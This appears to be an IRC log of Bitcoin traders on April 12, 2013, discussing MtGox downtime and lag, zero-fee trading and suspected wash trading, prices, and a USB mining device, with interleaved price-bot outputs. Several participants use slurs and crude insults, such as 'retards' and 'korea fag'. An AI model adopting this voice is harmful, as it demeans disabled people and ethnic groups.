12 17:45:22 stupid .01 btc floods Apr 12 17:45:28 bot Apr 12 17:45:34 yeah, multiple Apr 12 17:45:42 they are really hammering their system Apr 12 17:45:52 Error: Problem retrieving gox lag. Try again later. Apr 12 17:46:10 I don't know why Gox doesn't implement a minimum requirement for API trading Apr 12 17:46:21 agreed... Apr 12 17:46:37 and free trading for two days creates more problems for them Apr 12 17:46:59 back and to 73.6 Apr 12 17:47:03 ;;goxlag Apr 12 17:47:11 woosh Apr 12 17:47:23 ;;ticker --avg Apr 12 17:47:53 [MPEX] [S.MPOE] 3800 @ 0.00069424 = 2.6381 BTC [-] Apr 12 17:47:57 MtGox lag is 7.893106 seconds. During this time, light travels 0.0158176960484 AU. You could have sent a bitcoin one full loop along the orbit of the Moon around Earth (0.016 AU). Apr 12 17:48:01 Error: Failure to retrieve ticker. Try again later. Apr 12 17:51:22 ;;ticker Apr 12 17:51:24 BTCUSD ticker | Best bid: 73.59439, Best ask: 74.00000, Bid-ask spread: 0.40561, Last trade: 74.00000, 24 hour volume: 361168.20410729, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.71417 Apr 12 17:52:12 ;;bc,24hprc Apr 12 17:52:13 81.80 Apr 12 17:52:28 ;;bc,stats Apr 12 17:52:33 Current Blocks: 231000 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 839 blocks | Next Difficulty In About: 4 days, 21 hours, 45 minutes, and 15 seconds | Next Difficulty Estimate: 9121259.39971 | Estimated Percent Change: 18.87475 Apr 12 17:52:50 price has to follow that difficulty of bitcoin is doomed Apr 12 17:54:01 lol Apr 12 17:54:38 To 10 million Apr 12 17:54:55 Those june futures is looking pretty sweet Apr 12 17:55:02 sounds like friedcat is gearing up some hashes Apr 12 17:58:24 https://bitcointalk.org/index.php?topic=99497.msg1816098#msg1816098 Apr 12 17:59:10 so hard to read the tape right now.. Apr 12 17:59:17 What's the Intrinsic Value calc on an mpex put? (strike - vwap) / 1 ? Apr 12 18:00:07 yes. just strike - vwap . Apr 12 18:00:08 in dollars yea Apr 12 18:00:43 Gotcha, makes sense. So exercise is almost always better than selling to the bot. Apr 12 18:00:57 up until recejntly selling to the bot was always better Apr 12 18:01:04 but it's gone crazy with the volatility. Apr 12 18:01:26 Right I'd heard that one was better but couldn't remember which, so I was confused. Apr 12 18:01:57 i guess in spite of everything i'm goping to have to make changes to it. Apr 12 18:02:03 So option holders, remember to check both prices (sell and exercise) before you do one or the other out of habit! Apr 12 18:02:05 what has the best charts? Apr 12 18:02:09 crashed again Apr 12 18:02:11 ;;goxlag Apr 12 18:02:12 MtGox lag is 1.470043 seconds. During this time, light travels 0.00294594971258 AU. You could have sent a bitcoin from Jupiter to its third largest moon, Io (0.002819 AU). Apr 12 18:03:55 more unpleasantness on the way Apr 12 18:04:17 unpleasantness as in gox downtime, or price drops? Apr 12 18:04:45 one in the same no? Apr 12 18:04:50 heh Apr 12 18:04:53 both Apr 12 18:05:08 [BTCTC] [S.BBET-PT] 1 @ 0.0021 BTC [+] Apr 12 18:05:09 yay back Apr 12 18:05:11 at 70 Apr 12 18:05:26 got filled when it dipped to 69, I'm sure it'll go lower though Apr 12 18:05:28 stupid lag Apr 12 18:05:49 I think I may take up Ultimate Fighting after all this is through, as I'll miss getting punched in the face by the market Apr 12 18:06:12 looks like new temporary floor at 68 Apr 12 18:06:35 ;;ticker Apr 12 18:06:36 BTCUSD ticker | Best bid: 71.04147, Best ask: 71.50000, Bid-ask spread: 0.45853, Last trade: 71.50000, 24 hour volume: 369368.13969566, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.45432 Apr 12 18:06:53 ;;asks 85 Apr 12 18:06:54 There are currently 10128.579 bitcoins offered at or under 85.0 USD, worth 805040.60529 USD in total. | Data vintage: 82.4081 seconds Apr 12 18:07:08 we're going back up lol Apr 12 18:07:12 ;;bids 50 Apr 12 18:07:12 There are currently 48379.75 bitcoins demanded at or over 50.0 USD, worth 2803769.86843 USD in total. | Data vintage: 101.1060 seconds Apr 12 18:07:16 ;;bids 71 Apr 12 18:07:17 There are currently 32.186782 bitcoins demanded at or over 71.0 USD, worth 2285.51774436 USD in total. | Data vintage: 106.1531 seconds Apr 12 18:07:22 ;;ticker Apr 12 18:07:23 BTCUSD ticker | Best bid: 69.02000, Best ask: 71.45000, Bid-ask spread: 2.43000, Last trade: 69.02000, 24 hour volume: 369389.32445743, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.45363 Apr 12 18:07:27 ;;asks 77 Apr 12 18:07:29 There are currently 2876.6926 bitcoins offered at or under 77.0 USD, worth 218426.498028 USD in total. | Data vintage: 117.2500 seconds Apr 12 18:07:32 Nope down for a second Apr 12 18:07:43 Get ready to buy tho lol Apr 12 18:07:56 getting warmed up Apr 12 18:08:02 to sell actually lol Apr 12 18:09:03 [HAVELOCK] [SDICE] 2 @ 0.35 = 0.7 BTC [-] Apr 12 18:09:10 ;;ticker Apr 12 18:09:11 BTCUSD ticker | Best bid: 69.87000, Best ask: 69.99998, Bid-ask spread: 0.12998, Last trade: 69.99998, 24 hour volume: 370043.08884897, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.42992 Apr 12 18:09:23 ;;bc,24hprc Apr 12 18:09:24 81.66 Apr 12 18:09:51 !ticker m ^OIX Apr 12 18:09:52 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 123.90251552 / 218.88143499 / 226.22012381 (14550 shares, 2,478.62 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 12 18:15:27 ;;ticker Apr 12 18:15:29 BTCUSD ticker | Best bid: 75.00000, Best ask: 75.40000, Bid-ask spread: 0.40000, Last trade: 75.40000, 24 hour volume: 372625.87035167, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.34320 Apr 12 18:18:48 you know - i really think that this "no trading fees" thing at gox is actually creating even more problems... Apr 12 18:19:18 now it cost nothing to colude with others to create wash sales Apr 12 18:19:46 painting the tape is what we call it... Apr 12 18:20:07 wait gox has no fees right now? Apr 12 18:20:23 for next day and a half Apr 12 18:20:40 pgp that is an issue. Apr 12 18:20:50 no barrier to manipulation now... Apr 12 18:20:58 ;;ticker Apr 12 18:20:59 BTCUSD ticker | Best bid: 73.35630, Best ask: 74.59264, Bid-ask spread: 1.23634, Last trade: 73.35630, 24 hour volume: 374649.74877586, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.29169 Apr 12 18:21:02 moreover Apr 12 18:21:06 No manipulation is still there Apr 12 18:21:12 they're trying to create the imprerssion volume is still there. Apr 12 18:21:18 no BARRIER to manipulation Apr 12 18:21:23 nasically no matter what level the price reaches, itll be worked back and forth by a $10 spread Apr 12 18:22:00 mp: i think you're right Apr 12 18:22:08 itll take aggressive action to push it in any direction Apr 12 18:22:31 makes real price discovery that much harder Apr 12 18:23:03 [HAVELOCK] [VTX] 4 @ 0.36 = 1.44 BTC [-] Apr 12 18:23:05 [HAVELOCK] [VTX] 1 @ 0.3501 BTC [-] Apr 12 18:23:34 also with no fees, market making bots can just flood the system with orders, making things worse... Apr 12 18:23:36 hmmm..all this spasmodic behavior by gox is kind of a testament to the folly of meddling with money markets, which is what i thought bitcoin was designed to discourage Apr 12 18:23:50 gox... fucking retards... Apr 12 18:24:16 at this point we can only call them dumb for so many offenses, it has crossed into intentional Apr 12 18:24:23 what we need is a decentralized set of regional exchanges that are all "glued" together in terms of fund transfer, with standardized API's, etc, so arbitrage can be performed and people can use them Apr 12 18:24:47 these arent mistakes they are making Apr 12 18:24:58 no one makes that many Apr 12 18:25:06 splnkr: yes... I am a big advocate of such a thing... Apr 12 18:25:29 unfortunately such a system is only as strong as it's weakest link... Apr 12 18:25:46 its Apr 12 18:25:57 cool pgp just to be clear when i said 'people can use them' i meant people can go from one to the other and not have a whole new learning curve again for the basic deposit/withdrawal processes Apr 12 18:26:24 i.e., Dwolla Apr 12 18:26:26 lol Apr 12 18:26:50 i hear you... Apr 12 18:27:12 the whole thing is soooo fragmented right now... Apr 12 18:27:27 wall st about to pop too maybe Apr 12 18:28:20 not so long as FED keeps buying assets... Apr 12 18:28:38 fiat asset bubble is just starting Apr 12 18:28:45 again... Apr 12 18:29:05 [MPEX] [S.MPOE] 13124 @ 0.00069963 = 9.1819 BTC [+] Apr 12 18:29:08 [MPEX] [S.MPOE] 7976 @ 0.00070057 = 5.5877 BTC [+] Apr 12 18:29:24 volatility huh Apr 12 18:30:08 man, what a day Apr 12 18:30:09 gold getting SMACKED today... Apr 12 18:30:27 ;;ticker Apr 12 18:30:29 BTCUSD ticker | Best bid: 73.80000, Best ask: 73.80001, Bid-ask spread: 0.00001, Last trade: 73.80001, 24 hour volume: 376604.16676873, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.23934 Apr 12 18:31:37 some must made a ton of money out of this histeria Apr 12 18:33:00 fo sho Apr 12 18:33:54 http://tapastic.com/episode/3686 Apr 12 18:35:17 gox market is behaving very strangely... definately something unusual/artificial... Call me crazy, but just not passing the smell test for me right now... Apr 12 18:35:22 already 2 bastards that didn't pay their transactions on bitcoin.de Apr 12 18:36:51 pgp and oil and silver Apr 12 18:37:18 indeed Apr 12 18:37:27 it's like a buying frenzy for inflated currency Apr 12 18:37:37 what do you mean? Apr 12 18:37:50 well why sell your gold, bitcoin, silver? Apr 12 18:38:09 for dollars are euros that you know are being inflated heavily Apr 12 18:38:38 ;;ticker Apr 12 18:38:39 BTCUSD ticker | Best bid: 73.95835, Best ask: 73.98000, Bid-ask spread: 0.02165, Last trade: 73.95835, 24 hour volume: 378171.43939828, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.20200 Apr 12 18:39:38 [MPEX] [S.MPOE] 5674 @ 0.00070057 = 3.975 BTC [+] Apr 12 18:39:40 [MPEX] [S.MPOE] 4604 @ 0.00070081 = 3.2265 BTC [+] Apr 12 18:40:10 ;;seen smickles Apr 12 18:40:11 smickles was last seen in #bitcoin-assets 1 week, 0 days, 23 hours, 57 minutes, and 36 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 12 18:40:15 ;;seen jurov Apr 12 18:40:15 jurov was last seen in #bitcoin-assets 40 minutes and 7 seconds ago: yes. just strike - vwap . Apr 12 18:44:35 Good morning mircea_popescu Apr 12 18:49:57 hey Chilca Apr 12 18:50:23 HFT bots taking over? Apr 12 18:50:35 i think so... Apr 12 18:51:10 ugh we need the fees back Apr 12 18:51:14 and order fees Apr 12 18:51:25 any idea what's going on bitcoin-24.com? Apr 12 18:51:26 my feeling is that it's getting ready to break to the downside, though... Apr 12 18:52:04 mo, would you mind click the Buy $1m button a couple times? Apr 12 18:52:07 activity for last 1/2 hour just seems... odd... Apr 12 18:52:11 clicking* Apr 12 18:52:16 mp* Apr 12 18:53:39 i think humans are waiting for a shift before taking action Apr 12 18:53:49 but bots are making too much money from the people who arent Apr 12 18:53:57 ;;bc,24hprc Apr 12 18:53:58 81.53 Apr 12 18:54:42 we need whales to take action Apr 12 18:55:29 ;;bids 32 Apr 12 18:55:32 There are currently 113783.17 bitcoins demanded at or over 32.0 USD, worth 5511237.11861 USD in total. | Data vintage: 0.0049 seconds Apr 12 18:55:38 ;;bids 50 Apr 12 18:55:38 There are currently 52162.042 bitcoins demanded at or over 50.0 USD, worth 3057415.9691 USD in total. | Data vintage: 6.3262 seconds Apr 12 18:55:46 they have to turn the fees back on! this is totally artificial Apr 12 18:55:53 ;;bids 57 Apr 12 18:55:53 There are currently 30163.221 bitcoins demanded at or over 57.0 USD, worth 1904811.61423 USD in total. | Data vintage: 21.5855 seconds Apr 12 18:56:00 thanks gribble Apr 12 18:56:07 ;;ticker Apr 12 18:56:08 BTCUSD ticker | Best bid: 71.50000, Best ask: 71.89000, Bid-ask spread: 0.39000, Last trade: 71.50000, 24 hour volume: 382755.81915148, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.07081 Apr 12 18:56:17 ;;market buy 200 Apr 12 18:56:17 A market order to buy 200 bitcoins right now would take 14406.8631 USD and would take the last price up to 72.4000 USD, resulting in an average price of 72.0343 USD/BTC. | Data vintage: 45.5410 seconds Apr 12 18:56:18 ;;tslb Apr 12 18:56:24 Time since last block: 25 minutes and 57 seconds Apr 12 18:56:24 ;;market buy 1000 Apr 12 18:56:25 A market order to buy 1000 bitcoins right now would take 72536.2371 USD and would take the last price up to 72.8415 USD, resulting in an average price of 72.5362 USD/BTC. | Data vintage: 53.2205 seconds Apr 12 18:56:35 ;;nethash Apr 12 18:56:35 66244.078428 Apr 12 18:56:39 inb4 gox PR boasting about their new record volume Apr 12 18:56:45 what mp does this all point to ya think Apr 12 18:57:02 see...this is typical gox Apr 12 18:57:03 ya they've accomplished it Apr 12 18:57:07 maybe we're done for today Apr 12 18:57:10 do the exact opposite of what would make sense Apr 12 18:57:17 too many orders? incentivize more Apr 12 18:57:25 the btce volime died off quickly after gox was back :/ Apr 12 18:57:28 yeah, weird that it works out that way Apr 12 18:57:46 its super simple, you need to filter Apr 12 18:57:54 based on whatever metric you care to use Apr 12 18:57:55 ride isn't over yet... Apr 12 18:57:56 folks trade at gox and stop trading at btce Apr 12 18:58:04 of course Apr 12 18:58:20 0% fee is nice but eh Apr 12 18:58:39 who knows when they shut it down again for "cooldown" Apr 12 18:58:43 0 fees is a dick move Apr 12 18:59:34 [BTCTC] [ASICMINER-PT] 1 @ 0.7545 BTC [-] Apr 12 18:59:43 [BTCTC] [ASICMINER-PT] 1 @ 0.7547 BTC [+] Apr 12 18:59:49 [BTCTC] [ASICMINER-PT] 1 @ 0.7548 BTC [+] Apr 12 18:59:52 [BTCTC] [ASICMINER-PT] 3 @ 0.755 = 2.265 BTC [+] Apr 12 18:59:56 [BTCTC] [ASICMINER-PT] 1 @ 0.759 BTC [+] Apr 12 19:00:04 [BTCTC] [ASICMINER-PT] 1 @ 0.7599 BTC [+] Apr 12 19:00:13 0 fees is just plain dumb... Apr 12 19:00:19 [BTCTC] [ASICMINER-PT] 2 @ 0.76 = 1.52 BTC [+] Apr 12 19:00:54 just drop it .2% or something - making it free just makes things worse Apr 12 19:01:08 why? Apr 12 19:01:14 love it Apr 12 19:01:33 [BTCTC] [ASICMINER-PT] 10 @ 0.76 = 7.6 BTC [+] Apr 12 19:01:59 pgp they have absoluterly no idea what any of the buttons do,. Apr 12 19:02:02 [MPEX] [S.MPOE] 3673 @ 0.00070739 = 2.5982 BTC [+] Apr 12 19:02:05 [MPEX] [S.MPOE] 1800 @ 0.0007091 = 1.2764 BTC [+] Apr 12 19:02:12 [MPEX] [S.MPOE] 2500 @ 0.00071208 = 1.7802 BTC [+] Apr 12 19:02:12 buncha kids from the retarded kindergarten got into a boeing, are having fun Apr 12 19:02:58 [BTCTC] [ASICMINER-PT] 3 @ 0.76 = 2.28 BTC [+] Apr 12 19:04:04 logjam now unjammed... Apr 12 19:05:37 anyone here has got BITBOND bonds? Apr 12 19:06:06 Tritonio: i think Namworld holds a bit and amazingrando owes him a bit Apr 12 19:07:27 ya im pretty sure namworld had a good chunk Apr 12 19:07:40 well i theory that was a loan, not BITBOND bonds. I was actually looking for some of the people that actually had BITBOND. The ones that are supposed to be contacted by amazingrando to discuss about BITBOND-ASIC. I was going to ask if they ever got contacted by him about that. Apr 12 19:07:47 ugh, this is gonna get worse Apr 12 19:08:11 we're back on downtrend Apr 12 19:08:18 no one wants to buy into asks Apr 12 19:08:21 so down we go Apr 12 19:08:23 pop pop Apr 12 19:08:43 it had a chance to bounce from 70 to 99, but didnt happen :) Apr 12 19:08:49 yep Apr 12 19:08:54 no to 60 Apr 12 19:08:56 now* Apr 12 19:08:58 https://bitcointalk.org/index.php?topic=174549.msg1816764#msg1816764 this was 6 hours ago. Apr 12 19:09:06 6 hours later ? mtgox volume + 100k on usd alone Apr 12 19:09:15 and all other exchanges slightly under what they were. Apr 12 19:09:20 bitcoin ppl are totally retarded wtf. Apr 12 19:10:07 now watch these bid walls dodge the knife Apr 12 19:10:31 right... Apr 12 19:10:57 looks like i'm eating lunch at my desk... Apr 12 19:12:36 mircea_popescu: why is the bot not quoting? Apr 12 19:12:44 http://images.4chan.org/g/src/1365782921314.jpg mtgox headquarters Apr 12 19:12:49 check it out! Gox needs to turn fees back on Apr 12 19:12:51 oops Apr 12 19:12:56 wrong paste Apr 12 19:13:05 https://bitcointalk.org/index.php?topic=99497.msg1819469#msg1819469 Apr 12 19:13:07 Guest42002 probably charts failed to reply to it Apr 12 19:13:07 there ya go Apr 12 19:13:16 bitcoin-charts ? Apr 12 19:13:18 $avg Apr 12 19:13:20 Guest42002: 81.53 Apr 12 19:13:31 that's up so what's going on? Apr 12 19:13:32 :( Apr 12 19:13:34 300MHs usb miner! Apr 12 19:13:46 how fucking cool Apr 12 19:13:47 Guest42002 i have no idea. Apr 12 19:14:02 but you run the bot Apr 12 19:14:05 but you have to understand how the web works. Apr 12 19:14:15 the fact that a site answers to you doens't mean it answers everyone else. Apr 12 19:14:29 the facvt that it doesn't answer to you still doesn't mean it's not answering to everyone else. Apr 12 19:14:38 yes, but the bot is always up usually, he's been down a lot more :( Apr 12 19:14:40 the web is the web. Apr 12 19:14:57 well, most of bitcoin infrastructure was always up usually Apr 12 19:15:01 except when stuff is happening. Apr 12 19:15:21 asicminer developed a 300MHs sub powered mining gizmo Apr 12 19:15:33 and when stuff is happening is when people want to trade Apr 12 19:15:33 they are gonna sell like mad Apr 12 19:15:44 usb-powered Apr 12 19:15:44 ;;ticker Apr 12 19:15:46 [MPEX] [S.MPOE] 17015 @ 0.0007195 = 12.2423 BTC [+] Apr 12 19:15:46 BTCUSD ticker | Best bid: 67.80000, Best ask: 68.90000, Bid-ask spread: 1.10000, Last trade: 68.90000, 24 hour volume: 388885.47870841, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.85309 Apr 12 19:15:47 [MPEX] [S.MPOE] 15835 @ 0.00072 = 11.4012 BTC [+] Apr 12 19:16:19 http://thenextweb.com/insider/2013/04/12/it-made-sense-yesterday-the-libertarian-party-is-accepting-donations-in-bitcoin/ Apr 12 19:16:33 mircea_popescu: so why aren't you troubleshooting? Apr 12 19:16:51 what'd i do ? Apr 12 19:17:17 http://i.imgur.com/pzAootC.jpg?1 Apr 12 19:17:18 bitcoinchaerts just gave me a 504 Apr 12 19:18:30 i'm not sure friedcat can ever be doubted again after this, now i'm a fanboi Apr 12 19:18:37 lol oh mircea_popescu in the fact it says a couple of hours at most? Apr 12 19:18:54 faq* Apr 12 19:18:56 wow Apr 12 19:19:06 ThickAsThieves it does read pretty nice. Apr 12 19:19:33 Guest42002 "Last revision : February the 6th, 2013." Apr 12 19:19:40 i guess it will have to be revised. som,ethiong like Apr 12 19:20:02 its like the perfect solution to 51% concerns too Apr 12 19:20:08 "Bitcoin mostly consists of retards, MtGox is a piece of shit, nothing useful can be made in this space and if you try people will ask you why is everyone else retarded" Apr 12 19:20:11 every bitcoiner should own at least one usb miner Apr 12 19:20:20 ThickAs... TAKE MY BITCOOOOOOOOOOOOOOIN Apr 12 19:20:36 ThickAsThieves: but are they going to be sold onthe market? Apr 12 19:20:36 ^^^ Apr 12 19:20:41 of course Apr 12 19:20:45 mircea_popescu: so you havve lost faith in bitcoin because no one listens to you? Apr 12 19:20:46 tahts the point Apr 12 19:21:03 friedcat doesnt need to deal with a bunch of usb hubs Apr 12 19:21:07 Guest42002 no dude. i am just trying to illustrate to you kinda how pointless your approach is. Apr 12 19:21:10 he has racks on racks on racks Apr 12 19:21:15 mtgox just fucked bitcoin. Apr 12 19:21:18 charts doesn't work. Apr 12 19:21:24 you're asking me why the bot doesn't quote. Apr 12 19:21:28 no we fucked bitcoin Apr 12 19:21:31 BECAUSE CHARTS DONT WORK. thart's why. Apr 12 19:21:39 what about order books Apr 12 19:21:41 you warned us to stop buying at 130 Apr 12 19:21:54 that's really besides the point. Apr 12 19:21:55 no, he said it's not WORTH 130 Apr 12 19:21:58 it's not the price that's the issue. Apr 12 19:22:07 it's the fact those fuckwits can't keep trading orderly. Apr 12 19:22:20 i see orders and sells at given prices are those the same as the charts..i feel stupid for asking this Apr 12 19:22:24 and for the record i've not lost faith in bitcoin or anything. Apr 12 19:22:37 just, sitting there and hitting f5 on the mpex page is scarcely a good use of tyour time. Apr 12 19:22:47 if it catches a feed it quotes (it has multiple times today) Apr 12 19:22:49 [BTCTC] [BTC-BOND] 1 @ 0.01019 BTC [+] Apr 12 19:22:56 if you actually want to buy/sell, wait for one of those and do so. Apr 12 19:23:01 there definitely are going to be gaps. Apr 12 19:23:08 today, yesterday, for as long as market stays disorderly Apr 12 19:23:10 that wasn't what I was pointing out but I guess you're right in that sense, what was the url for stat json feed? Apr 12 19:23:13 Hi Mircea Apr 12 19:23:14 if we dont touch 75 soon, its gonna get worse Apr 12 19:23:17 which pretty much means for as long as gox exists, going forward Apr 12 19:23:18 hi Ali__ Apr 12 19:23:28 cheers for the channel link Apr 12 19:23:28 mircea_popescu: thanks for you help and being available Apr 12 19:23:30 Guest42002 i Apr 12 19:23:38 'd love to get you the url but can't load the site to do so. Apr 12 19:23:51 oh noes? are you under attack? Apr 12 19:23:59 what is with this guy Apr 12 19:24:08 why dont we ban people in this channel again? Apr 12 19:24:09 no dood, i'm not under any attack. site doesn't load 0.o Apr 12 19:24:18 ThickAsThieves cause we're perverse. Apr 12 19:25:00 mmm masochism Apr 12 19:25:02 actually now it's back Apr 12 19:25:13 http://bitcoincharts.com/t/weighted_prices.json Apr 12 19:25:14 sweet thank mircea_popescu I"m sorry for being a poop Apr 12 19:25:23 also : mpexbot caches the avg. Apr 12 19:25:27 mpex.co is loading fine,if thats what he is bitching about Apr 12 19:25:32 i was asking for mpex stat there is a public url for json feed from mpex yes? Apr 12 19:25:40 forgiven, only because i love the word poop Apr 12 19:25:51 poop poop poop Apr 12 19:25:54 o that. Apr 12 19:26:00 it's in the faq tyou know. Apr 12 19:26:08 i thought you wanted the btccharts json Apr 12 19:26:43 jborkl i've had issues with the bot not quoting these past days because it couldn't get the price feed and other data. Apr 12 19:26:51 tho i've just looked and it's quoting nao. Apr 12 19:27:15 or was. heh i guess we've been chatting for ten minutes here. Apr 12 19:28:36 yay he's back Apr 12 19:28:51 you two got a real thing going huh. Apr 12 19:29:11 so were you looking to buy something or just get heartbroken whenever bot's away ? Apr 12 19:29:30 mtgox down Apr 12 19:29:47 ;;goxlag Apr 12 19:30:01 nope sell Apr 12 19:30:10 there is no lag, it is down again Apr 12 19:30:12 alrighty so there's your chance. Apr 12 19:30:19 jborkl this success... Apr 12 19:30:23 [BTCTC] [ASICMINER-PT] 1 @ 0.7599 BTC [-] Apr 12 19:30:38 [BTCTC] [ASICMINER-PT] 1 @ 0.76 BTC [+] Apr 12 19:30:44 Error: Problem retrieving gox lag. Try again later. Apr 12 19:30:51 no fee trades, could not have ended bad.. when they were already overloaded with volume Apr 12 19:31:36 for fucking realz? Apr 12 19:31:42 and btce down Apr 12 19:32:19 dude what's the point Apr 12 19:32:26 we can't even trade Apr 12 19:32:41 no point Apr 12 19:32:50 other than fair warning price is about to drop again Apr 12 19:32:53 might as well die and give up.... Apr 12 19:33:26 lol Apr 12 19:33:44 bitcoin needs less investment of capital, moar brainz Apr 12 19:34:10 or maybe more troll boxes on trading sites... Apr 12 19:34:13 lol Apr 12 19:34:25 more troll boxes Apr 12 19:34:46 hey guys this is just a helpful note Apr 12 19:34:49 I cant even use btce , the troll box pisses me off too bad Apr 12 19:34:50 for the full mtgox experience Apr 12 19:34:55 make sure that you have java installed Apr 12 19:35:01 with the plugin turned on Apr 12 19:35:28 after all, you can't really be a btc trader until you've had your wallet stolen by spearfishers at least once Apr 12 19:35:40 full MtGox exp? I think fuck up , bend over , no lube Apr 12 19:35:54 the full experience of success victimization ? Apr 12 19:36:12 jborkl: https://btc-e.com/disableChat Apr 12 19:36:19 oh, nice Apr 12 19:36:24 thanks Apr 12 19:36:29 np Apr 12 19:36:49 now that's a good idea. Apr 12 19:36:52 Anything to get more volume in and keep it off gox Apr 12 19:37:35 bitcoin needs moar infratstructure Apr 12 19:38:03 mircea_popescu: bitcoin already has brainz no one listens to them Apr 12 19:38:16 gox just rebooted Apr 12 19:38:40 ;;goxlag Apr 12 19:38:41 MtGox lag is 1.647474 seconds. During this time, light travels 0.00330151944996 AU. You could have sent a bitcoin from Jupiter to its third largest moon, Io (0.002819 AU). Apr 12 19:38:43 Bitcoin needs WAY more merchant, WAY more goods for sale. Apr 12 19:38:51 Doffx brainz first. Apr 12 19:39:00 otherwise the merchants will get fucked, not want to try it again Apr 12 19:39:08 cute, gox keeps goxing Apr 12 19:39:29 502 Bad Gateway Apr 12 19:39:32 most merchants with brains that i've spoken to take BTC way over market due to risk (usually caused by gox) Apr 12 19:39:32 anyone else ? Apr 12 19:39:56 I am on and logged in Apr 12 19:39:58 i'm wondering how bad the btcpay accepting merchants got burned in the past day Apr 12 19:40:05 We need a decentralized exchange to give us better price discovery for BTC Apr 12 19:40:06 its working right now but had an outage of 10 mins ... Apr 12 19:40:07 ;;bc,24hprc Apr 12 19:40:08 80.94 Apr 12 19:41:07 And I need to be smarter and better at programming so I could just make my own, dammit. Apr 12 19:41:19 [MPEX] [S.MPOE] 9165 @ 0.00072 = 6.5988 BTC [+] Apr 12 19:41:21 [MPEX] [S.MPOE] 4000 @ 0.00072363 = 2.8945 BTC [+] Apr 12 19:41:23 [MPEX] [S.MPOE] 1735 @ 0.00073 = 1.2666 BTC [+] Apr 12 19:41:28 not worth all that legal trouble... Apr 12 19:41:34 Doffx a concerted effort to push local bitcoins would be great i guess. Apr 12 19:41:39 or some other decentralised solution like that. Apr 12 19:41:50 starting an exchange is nonsense imo. just trade. Apr 12 19:42:03 There would be no legal taub if it was not controlled by anyone Apr 12 19:42:33 how would that work Apr 12 19:42:38 does ripple fill this need? Apr 12 19:42:40 open outcry market? Apr 12 19:42:42 anyone? Apr 12 19:42:48 of decentralized trading? Apr 12 19:42:59 MJR_ i was explaining a month or two ago how to get a fixing market for btc. Apr 12 19:43:06 sadly we're not quite there yet. Apr 12 19:43:07 [BTCTC] [ASICMINER-PT] 1 @ 0.7609 BTC [+] Apr 12 19:43:10 Hell if I knew how it would work id be building it. Apr 12 19:43:43 I just know we need some virtual way to discover price that cannot be halted by a DOS attack or maintenance Apr 12 19:43:45 [BTCTC] [ASICMINER-PT] 1 @ 0.7609 BTC [+] Apr 12 19:44:03 breaking out now.... let's see what happens! Apr 12 19:44:27 wow Apr 12 19:44:33 it actually broke 75 Apr 12 19:44:42 kaminsky says he can't hack bitcoin on businessinsider Apr 12 19:44:42 doesnt mean anything.... Apr 12 19:45:04 82 is real test Apr 12 19:45:23 Tell it to go back to like 140 I want to go buy silver Apr 12 19:45:59 Doffx, you might wanna come back in a month or two then Apr 12 19:46:05 Anyhow, off to move a hotel Payment system to a new server, lets hope all my planning paid off. Apr 12 19:46:09 lol silver got usagi'd ? Apr 12 19:46:11 Ill be here ThickAsThieves Apr 12 19:46:59 lol, he could fuck up a wet dream Apr 12 19:47:05 well now: http://data.cnbc.com/quotes/MTGOXUSD Apr 12 19:47:25 heh Apr 12 19:48:02 Gox IPO next? Apr 12 19:48:05 hehe Apr 12 19:48:12 Volume 0 Apr 12 19:48:14 seems legit. Apr 12 19:48:57 in other news, bitbet over 6k btc bet Apr 12 19:48:58 http://images.4chan.org/pol/src/1365784521387.jpg someone shop clark moody into this Apr 12 19:51:14 lol korea fag has a phone and a video game Apr 12 19:51:30 [BTCTC] [ASICMINER-PT] 2 @ 0.7609 = 1.5218 BTC [+] Apr 12 19:51:33 [BTCTC] [ASICMINER-PT] 1 @ 0.7609 BTC [+] Apr 12 19:51:37 [BTCTC] [ASICMINER-PT] 15 @ 0.761 = 11.415 BTC [+] Apr 12 19:52:03 taub: why shop him, he probably took the picture Apr 12 19:52:09 [BTCTC] [ASICMINER-PT] 1 @ 0.7608 BTC [-] Apr 12 19:54:17 http://db.tt/vQj330VP Apr 12 19:57:11 [BTCTC] [ASICMINER-PT] 1 @ 0.7605 BTC [-] Apr 12 19:57:19 that is great... Apr 12 19:59:20 [BTCTC] [ASICMINER-PT] 1 @ 0.7605 BTC [-] Apr 12 20:00:01 the chart just can't catch a break here... Apr 12 20:01:28 beat me to it ThickAsThieves Apr 12 20:01:51 https://dl.dropboxusercontent.com/u/6911896/1365784521387s.jpg Apr 12 20:01:56 http://data.cnbc.com/quotes/MTGOXUSD Apr 12 20:02:13 mtgox is delaying bitcoin depoits past 6 confirms Apr 12 20:02:17 dont event thinks to share this pictures :) in b4 backfire from US gov :) Apr 12 20:02:17 here I fixed it Apr 12 20:02:18 http://db.tt/vQj330VP Apr 12 20:02:30 lol Apr 12 20:02:44 saved Apr 12 20:03:02 [HAVELOCK] [SDICE] 3 @ 0.347 = 1.041 BTC [-] Apr 12 20:03:22 ThickAsThieves; it was 77 btw Apr 12 20:03:26 [BTCTC] [ASICMINER-PT] 1 @ 0.7605 BTC [-] Apr 12 20:03:36 lol Apr 12 20:03:48 Jcpham !! wtf is that !! to sooooon to sooooon Apr 12 20:04:05 ;;bc,24hprc Apr 12 20:04:06 80.81 Apr 12 20:04:32 jcpham: um holy shit - that's pretty huge Apr 12 20:05:14 lol look at this bot action Apr 12 20:05:18 RIDICULOUS Apr 12 20:05:28 how about this :P Apr 12 20:05:30 http://i.imgur.com/W5tdYx5.png Apr 12 20:05:58 nice Apr 12 20:06:16 with the freflection n all Apr 12 20:06:20 ye :> Apr 12 20:06:21 -g Apr 12 20:06:51 [MPEX] [S.DICE] 1000 @ 0.00369999 = 3.7 BTC 